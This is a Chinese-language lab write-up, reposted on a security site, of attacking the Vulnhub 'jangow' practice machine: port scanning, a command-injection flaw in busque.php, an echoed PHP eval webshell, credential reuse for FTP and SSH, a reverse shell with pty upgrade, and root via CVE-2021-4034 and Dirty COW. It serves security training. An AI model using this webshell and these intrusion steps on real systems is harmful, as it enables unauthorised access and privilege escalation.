Vulnhub之jangow打靶思路

admin 2022年11月9日12:18:42安全文章评论6 views1562字阅读5分12秒阅读模式

1.  打靶思路总结

信息收集-命令执行-getshell-FTP登陆-不出网反弹shell-ptyshell-SSH登陆-dirtycow提权,最终拿到root权限,获取Flag。

* 攻击机:Kali,本机
* 目标靶机:jangow

2. 信息收集

靶机IP:192.168.56.118,Nmap进行端口扫描,靶机开放80以及21FTP端口,尝试FTP弱口令是否能登陆,经测试,anoymous/anoymous弱口令不存在。Vulnhub之jangow打靶思路随后访问80端口,web站点出现,PHP站点+Apache中间件。

Vulnhub之jangow打靶思路

尝试进行目录扫描:只发现了静态资源文件夹Vulnhub之jangow打靶思路尝试访问其它界面:http://192.168.56.118/site/busque.php?buscar=

bp进行不断Fuzz,命令执行漏洞X1Vulnhub之jangow打靶思路Vulnhub之jangow打靶思路

3.一句话木马Getshell

既然存在命令执行,尝试使用PHP反弹shell试试,PHP反弹shell失败,怀疑不出网

查看系统有无python,使用python反弹shell,nc没反应,大概率就是不出网Vulnhub之jangow打靶思路

随后转变思路,尝试echo一句话进去,哥斯拉生成php马

echo '<?php eval($_POST["ace"]);' > ace.php

Vulnhub之jangow打靶思路木马成功写入,使用哥斯拉连接,随后查看站点目录有无可用信息等,发现数据库连接信息,但是数据库服务未开启,但站点开启了21FTP端口,尝试此账号密码登陆失败。Vulnhub之jangow打靶思路

继续找别的敏感信息,随后再整站目录下发现另外一个数据库连接账号密码的备份文件。Vulnhub之jangow打靶思路

继续尝试用账号密码进行FTP登陆,提示登陆成功Vulnhub之jangow打靶思路随后cd到不同的目录中,查找文件,由于当前为www权限,进入目录很多无权限。进入到home目录下,发现关键信息Vulnhub之jangow打靶思路jangow01文件夹下存放了user.txt,使用FTP命令下载到本地打开Vulnhub之jangow打靶思路第一个Flag已拿到:d41d8cd98f00b204e9800998ecf8427e

4.反弹Shell

哥斯拉的中有不出网反弹shell的模块:RealCmd,填好参数后,尝试进行shell反弹Vulnhub之jangow打靶思路

本地nc监听4444即可:Vulnhub之jangow打靶思路反弹成功,但是此时反弹回来的shell很多命令都没办法使用,比如top,vim,sudo等Vulnhub之jangow打靶思路如果此时目标主机存在python环境的话,我们可以尝试使用ptyshell可以实现简单的tty。

whereis python查看有无python环境,信息收集的时候我们已经得知,靶机有python3环境,于是直接运行:

python3 -c 'import pty; pty.spawn("/bin/bash")'

Vulnhub之jangow打靶思路

然后就可以尝试各种命令了,再查看端口的时候,发现开放了22SSH端口:

Vulnhub之jangow打靶思路

如果可以SSH登陆进去,那就很方便了。

尝试SSH登陆,使用刚刚的FTP账号密码进行尝试。吼,登陆成功

Vulnhub之jangow打靶思路

5.提权(1)

目前针对这台主机已经拿下webshell,FTP账号密码,SSH账号密码,但是shell权限是www,无法查看root下的文件,那就提权。

uname -a 得知是ubuntu 4.4.0,,Kali直接:searchspolit 4.4.0Vulnhub之jangow打靶思路Vulnhub之jangow打靶思路也可直接百度搜索ubuntu 4.4.0提权等等,在此我使用的是脏牛或者CVE-2021-4034

首先查看目标主机是否安装gccVulnhub之jangow打靶思路随后上传CVE-2021-4034到/tmp临时目录下,使用FTP上传或者哥斯拉上传都可以。Vulnhub之jangow打靶思路随后进入到tmp目录下,随后编译此文件Vulnhub之jangow打靶思路编译成功后会在当前目录生成exp文件

Vulnhub之jangow打靶思路

随后./exp进行提权操作,成功提升至root权限!Vulnhub之jangow打靶思路进入root目录下查看文件Vulnhub之jangow打靶思路读取proof.txt,第二个Flag拿到

Vulnhub之jangow打靶思路

6.提权(2)

继续使用脏牛提权

原理同上,上传至tmp目录下,随后进行编译Vulnhub之jangow打靶思路编译成功:

Vulnhub之jangow打靶思路

进行提权:

然后系统死机了???

打靶结束!

原文始发于微信公众号(藏剑安全):Vulnhub之jangow打靶思路

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年11月9日12:18:42
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  Vulnhub之jangow打靶思路 http://cn-sec.com/archives/1393742.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: